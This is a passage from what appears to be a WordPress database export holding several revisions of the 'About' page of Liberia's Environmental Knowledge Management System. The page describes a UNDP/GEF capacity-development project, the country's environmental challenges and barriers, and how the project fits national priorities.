requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:</p>\n<ul>\n<li>Peace, Security, Rule of Law</li>\n<li>Sustainable Economic Transformation</li>\n<li>Human Development</li>\n<li>Inclusive Governance and Public Institutions</li>\n</ul>\n<p>The UNDAF (One Programme) also aligns with Liberia’s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:</p>\n<ul>\n<li>Peace, Security and Rule of Law</li>\n<li>Economic Transformation</li>\n<li>Human Development</li>\n<li>Governance and Public Institutions</li>\n<li>Cross-cutting issues</li>\n</ul>\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information/data.</p>\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.</p>\n<h4>A.4 Baseline Scenario and Associated Baseline Projects</h4>\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country’s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia’s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia’s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015). </p>\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia. </p>\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions. </p>\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization. </p>\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.</p>\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:</p>\n<h4>Associated Baseline Projects</h4>\n<table style=\"width: 100%;\">\n<tbody>\n<tr>\n<th><strong>Project Name</strong></th>\n<th><strong>Description of project’s alignment with CCCD project</strong></th>\n</tr>\n<tr>\n<td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)</td>\n<td>The expected results of this project included improving the rural communities’ capacities, increasing sustainable livestock and crop production, and reducing poverty.</td>\n</tr>\n<tr>\n<td>FAO to Support MOA Statistics and Information Management System</td>\n<td>The objective of this project was to support the implementation of a linked information and knowledge system.</td>\n</tr>\n<tr>\n<td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC)</td>\n<td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.</td>\n</tr>\n</tbody>\n</table>\n<h3>B. Strategy</h3>\n<h4>B.1 Alternative Strategies</h4>\n<p>During the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia. An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project . A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.</p>\n<p>The single most common cross-cutting capacity development constraint that was recurring in the various assessments and action plans was the significantly low institutional capacity for managing data and information for improved planning and decision-making to meet and sustain Rio Convention obligations. Taking into account the GEF-6 Cross-Cutting Capacity Development priority of strengthening mainstreaming capacities as a strategy to meet the duality of national development and global environmental priorities, this project’s objective was formulated.</p>\n<p>From an implementation perspective, a number of alternative approaches were considered to meet the stated objective. One was for Liberia to continue the same approach of implementing focal area projects, and to strengthen the key set of systemic, institutional, and individual capacities through focal area projects. However, this approach will not address the capacity development gaps nor result in creating synergies. Another aspect considered was to have different components executed by different agencies. The challenge with this approach is the relative weak coordination among government ministries and agencies – indeed an important capacity development need that the project would help address. A related issue was the government’s keen desire to use the project to strengthen national capacity of the Environmental Protection Agency.</p>\n<p>The selected strategy was based on the real need to strengthen meaningful capacities that can be successfully institutionalized. The key here is not for the project to take on more than the Environmental Protection Agency can absorb, but rather, through the process of project execution, learn how to formulate better plans and make better decisions regarding the global environment within the framework of their institutional mandates. That is, this project places a premium on address institutional sustainability by emphasizing the execution of the project through a wide range of learning-by-doing exercises by the EPA. This will require that they reach out of other government ministries and agencies to meet complementary and shared mandates as well as to effectively negotiate resolution of real or perceived conflicts of interests that come about through Rio Convention mainstreaming.</p>		\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).</p>		\n			<h2>Disclaimer</h2>		\n		<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-13 09:58:05','2019-11-13 09:58:05','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(2002,1,'2019-11-13 10:01:15','2019-11-13 10:01:15','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>\n<h4>Root Causes</h4>\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia’s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.</p>\n<h4>A2. Capacity Barriers</h4>\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:</p>\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Inadequate public awareness and education/training</li>\n<li>Inadequate institutions and institutional frameworks</li>\n<li>Inadequate political commitment</li>\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation</li>\n<li>Inadequate financial resources and economic framework</li>\n<li>Inadequate strategic plans and implementation</li>\n<li>Inadequate access to information</li>\n<li>Inadequate policies and legal frameworks</li>\n<li>Low level of involvement of civil society</li>\n<li>Inadequate natural resources management systems</li>\n<li>Lack of institutional capacities</li>\n<li>Lack of effective mechanism for information processing and sharing</li>\n<li>\n<p>Poor governance</p>\n</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul><p>Liberia’s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:</p>\n<ul>\n<li>Weak technical, administrative and managerial capacities;</li>\n<li>Weak institutional coordination;</li>\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;</li>\n<li>Limited stakeholder participation in planning and decision-making processes;</li>\n<li>Limited dissemination of key information (Republic of Liberia, 2013).</li>\n</ul>\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).</p>\n<h4>A.3 Consistency with National Priorities</h4>\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).</p>\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size/number of protected areas. In Liberia’s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.</p>\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.</p>\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.</p>\n<p>The project is also in line with Liberia’s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia’s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).</p>\n<p>Liberia’s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia’s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.</p>\n<p>This project is also in line with Liberia’s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:</p>\n<ul>\n<li>Peace, Security, Rule of Law</li>\n<li>Sustainable Economic Transformation</li>\n<li>Human Development</li>\n<li>Inclusive Governance and Public Institutions</li>\n</ul>\n<p>The UNDAF (One Programme) also aligns with Liberia’s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:</p>\n<ul>\n<li>Peace, Security and Rule of Law</li>\n<li>Economic Transformation</li>\n<li>Human Development</li>\n<li>Governance and Public Institutions</li>\n<li>Cross-cutting issues</li>\n</ul>\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information/data.</p>\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.</p>\n<h4>A.4 Baseline Scenario and Associated Baseline Projects</h4>\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country’s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia’s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia’s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015). </p>\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia. </p>\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions. </p>\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization. </p>\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.</p>\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:</p>\n<h4>Associated Baseline Projects</h4>\n<table style=\"width: 100%;\">\n<tbody>\n<tr>\n<th><strong>Project Name</strong></th>\n<th><strong>Description of project’s alignment with CCCD project</strong></th>\n</tr>\n<tr>\n<td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)</td>\n<td>The expected results of this project included improving the rural communities’ capacities, increasing sustainable livestock and crop production, and reducing poverty.</td>\n</tr>\n<tr>\n<td>FAO to Support MOA Statistics and Information Management System</td>\n<td>The objective of this project was to support the implementation of a linked information and knowledge system.</td>\n</tr>\n<tr>\n<td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC)</td>\n<td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.</td>\n</tr>\n</tbody>\n</table>\n<h3>B. Strategy</h3>\n<h4>B.1 Alternative Strategies</h4>\n<p>During the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia. An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project . A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.</p>\n<p>The single most common cross-cutting capacity development constraint that was recurring in the various assessments and action plans was the significantly low institutional capacity for managing data and information for improved planning and decision-making to meet and sustain Rio Convention obligations. Taking into account the GEF-6 Cross-Cutting Capacity Development priority of strengthening mainstreaming capacities as a strategy to meet the duality of national development and global environmental priorities, this project’s objective was formulated.</p>\n<p>From an implementation perspective, a number of alternative approaches were considered to meet the stated objective. One was for Liberia to continue the same approach of implementing focal area projects, and to strengthen the key set of systemic, institutional, and individual capacities through focal area projects. However, this approach will not address the capacity development gaps nor result in creating synergies. Another aspect considered was to have different components executed by different agencies. The challenge with this approach is the relative weak coordination among government ministries and agencies – indeed an important capacity development need that the project would help address. A related issue was the government’s keen desire to use the project to strengthen national capacity of the Environmental Protection Agency.</p>\n<p>The selected strategy was based on the real need to strengthen meaningful capacities that can be successfully institutionalized. The key here is not for the project to take on more than the Environmental Protection Agency can absorb, but rather, through the process of project execution, learn how to formulate better plans and make better decisions regarding the global environment within the framework of their institutional mandates. That is, this project places a premium on address institutional sustainability by emphasizing the execution of the project through a wide range of learning-by-doing exercises by the EPA. This will require that they reach out of other government ministries and agencies to meet complementary and shared mandates as well as to effectively negotiate resolution of real or perceived conflicts of interests that come about through Rio Convention mainstreaming.</p>\n<h4>B.2 Selected Scenario</h4>\nThis project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<p style=\"background-color:lightgray;\">\nThe uniqueness of this project is centered on its cross-cutting nature.  Other projects currently under implementation focus on strengthening targeted capacities under one of the three Rio Conventions, and thus have a relatively narrower system boundary than the CCCD programme approach.  In the absence of the CCCD project, there remains likelihood that Liberia would not realize its full potential for sustainable development due to limited coordination and decentralization.  Additionally, it is likely that environmental management in Liberia would continue to focus on traditionally narrow constructs.</p>		\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).</p>		\n			<h2>Disclaimer</h2>		\n		<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-13 10:01:15','2019-11-13 10:01:15','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(2003,1,'2019-11-13 10:03:54','2019-11-13 10:03:54','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>\n<h4>Root Causes</h4>\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia’s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.</p>\n<h4>A2. Capacity Barriers</h4>\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:</p>\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Inadequate public awareness and education/training</li>\n<li>Inadequate institutions and institutional frameworks</li>\n<li>Inadequate political commitment</li>\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation</li>\n<li>Inadequate financial resources and economic framework</li>\n<li>Inadequate strategic plans and implementation</li>\n<li>Inadequate access to information</li>\n<li>Inadequate policies and legal frameworks</li>\n<li>Low level of involvement of civil society</li>\n<li>Inadequate natural resources management systems</li>\n<li>Lack of institutional capacities</li>\n<li>Lack of effective mechanism for information processing and sharing</li>\n<li>\n<p>Poor governance</p>\n</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul><p>Liberia’s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:</p>\n<ul>\n<li>Weak technical, administrative and managerial capacities;</li>\n<li>Weak institutional coordination;</li>\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;</li>\n<li>Limited stakeholder participation in planning and decision-making processes;</li>\n<li>Limited dissemination of key information (Republic of Liberia, 2013).</li>\n</ul>\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).</p>\n<h4>A.3 Consistency with National Priorities</h4>\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).</p>\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size/number of protected areas. In Liberia’s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.</p>\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National 